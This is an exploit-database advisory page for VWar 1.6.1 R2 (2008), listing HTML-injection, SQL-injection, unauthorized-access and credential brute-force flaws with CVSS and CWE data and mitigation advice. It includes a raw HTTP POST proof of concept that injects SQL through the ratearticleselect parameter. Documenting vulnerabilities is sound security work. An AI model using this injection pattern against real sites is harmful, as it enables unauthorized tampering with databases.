header-logo
Suggest Exploit
vendor:
VWar
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple HTML-injection, SQL-injection, Unauthorized-access, Brute-force authentication credentials
79, 89, 522, 539, 287
CWE
Product Name: VWar
Affected Version From: VWar 1.6.1 R2
Affected Version To: VWar 1.6.1 R2
Patch Exists: YES
Related CWE: N/A
CPE: a:vwar:vwar:1.6.1_r2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

VWar Multiple Remote Vulnerabilities

An attacker can exploit these issues to compromise the affected application, gain unauthorized access to the application, execute arbitrary script code, steal cookie-based authentication credentials, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks are also possible.

Mitigation:

Ensure that all input is validated and filtered before being used in the application. Ensure that all output is properly encoded before being sent to the user. Use a web application firewall to detect and block malicious input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29001/info

VWar is prone to multiple remote vulnerabilities, including:

- Multiple HTML-injection vulnerabilities
- An SQL-injection vulnerability
- An unauthorized-access vulnerability
- A vulnerability that allows attackers to brute-force authentication credentials

An attacker can exploit these issues to compromise the affected application, gain unauthorized access to the application, execute arbitrary script code, steal cookie-based authentication credentials, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks are also possible.

VWar 1.6.1 R2 is vulnerable; other versions may also be affected. 

  POST /vwar/article.php?rate=1 HTTP/1.1
   Host: mydomain.com
   User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.13)
Gecko/20080311 Firefox/2.0.0.13
   Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
   Accept-Language: en-gb,en;q=0.5
   Accept-Encoding: gzip,deflate
   Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
   Keep-Alive: 300
   Proxy-Connection: keep-alive
   Referer: http://mydomain.com/vwar/article.php?articleid=1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 64

   ratearticleselect=5, article = char(78,71,83,32,84,69,83,84)